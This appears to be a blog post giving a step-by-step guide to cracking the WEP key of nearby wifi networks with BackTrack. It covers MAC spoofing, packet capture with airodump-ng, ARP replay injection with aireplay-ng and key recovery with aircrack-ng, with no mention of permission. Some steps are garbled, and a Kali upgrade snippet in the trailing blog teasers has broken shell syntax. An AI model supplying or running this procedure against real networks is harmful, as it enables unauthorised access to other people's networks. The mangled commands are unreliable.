Skip to main content

How to Hack wifi with backtrack

Step 1:-First download backtrack

Step 2:-Burn the iso image on CD and boot your laptop from CD drive

Step 3:-Select the third boot option(VESA/KDE).

Step 4:-Once in BT3, click the tiny black box in the lower left corner to load up a"Konsole" window.

Step 5:-Type the following commandairmon-ngNote down the interface name.
In this example wifi0Step

6:-airmon-ng stop wifi0Step

7:-ifconfig wifi0 down

Step 8:-mac changer --mac 00:11:22:33:44:66 wifi0Step

9:-airmon-ng start wifi0Step

10:-airodump-ng wifi0. This will start populating Wifi networks.

Press Ctrl + C to stop.  Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paperNote that if the same BSSID is available in the second part with STATION associated with it, means you some one is accessing that network and our task will be little easier.  If not than don’t worry we will still crack it.

Step 11:-airodump-ng -c (channel) -w (file name)Replace(channel) with the CH which u had already n(file name) with any name of your choice(bssid) with the BSSID which u had already note--bssid (bssid) wifi0Note it leave this console as it is and start new console step

12:-aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0If you don’t get Association Successful mesage then keep on trying until you got success.

Steps13:-aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0. Well if you don’t see ARP ACK and sent packets are not increasing or still 0. than it means no 1 is accessing that network. But don’t worry you go an optional step, Leave this console as it is and start new konsole

Step 14:-aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF konsole message than keep on trying until you get success got an optional step konsole–b (bssid) –h 00:11:22:33:44:66 wfi0 Press y and enter Now you will see that ARP and ACK packets in 2nd console are increasing fast Keep this console as it is and start 4th console.

Step 15:-aircrack-ng -b (bssid) (filename)-Just wait and watch…..Backtrack will do rest of the work.Hurray we got the key.Done..!!

Comments

Popular posts from this blog

Upcoming Book- Kali Linux Revealed: Mastering the Penetration Testing Distribution

More exciting news! In the past year, Kali Linux Official Team has been working internally on an Official Kali Linux book – Kali Linux Revealed: Mastering the Penetration Testing Distribution . This is the first official Kali book from Offsec Press , and is scheduled for release on June 5th, 2017 . Kali Linux Revealed will be available in both hard copy and online formats. Keeping the Kali Linux spirit, the online version of the book will be free of charge, allowing anyone who wishes to hone their skills and improve their knowledge of Kali to do so at no cost. This book, together with our official Kali documentation site will encompass the body of knowledge for the Kali Linux Certified Professional   (KLCP) .

Kali Linux: A complete InfoSec Distro

BackTrack has always been a popular choice when it comes to security and penetration testing. This open source distro has gained a lot of popularity and was rolled till version 5 with frequent changes to the variants. This project from Offensive Security has been moved from Ubuntu to Debian and the operating system is now renamed as Kali Linux. If you have installed a fresh copy of Kali Linux, then you might have noticed some awesome security and penetration tools under Kali Linux drop down menu list. These tools are powerful and yet efficient to use. If you go through the menu list of security tools, you might have noticed that few like Wireless Attacks, Forensics and Reverse Engineering is added, which is quite impressive. One more section has been added in the list, ie Hardware Hacking. One more thing that you would be happy to see is Arduino kit on the list. Arduino is a single-board microcontroller designed to make the process of using electronics in multi-disciplinary projects mo...

EOF of Kali Linux 1.0

Kali Sana (ver. 2.0) has been out there couple of months ago and the response was great. Kali Moto (ver. 1.0) has been given 2 months of grace period to date the version to 2.0. To upgrade, edit the souces.list file and put the following entries. cat >> EOF < /etc/apt/sources.list deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security/ sana/updates main contrib non-free EOF Then, run the following command to do upgrade Kali Moto to Kali Sana. apt-get update apt-get dist-upgrade # get a coffee, or 10. reboot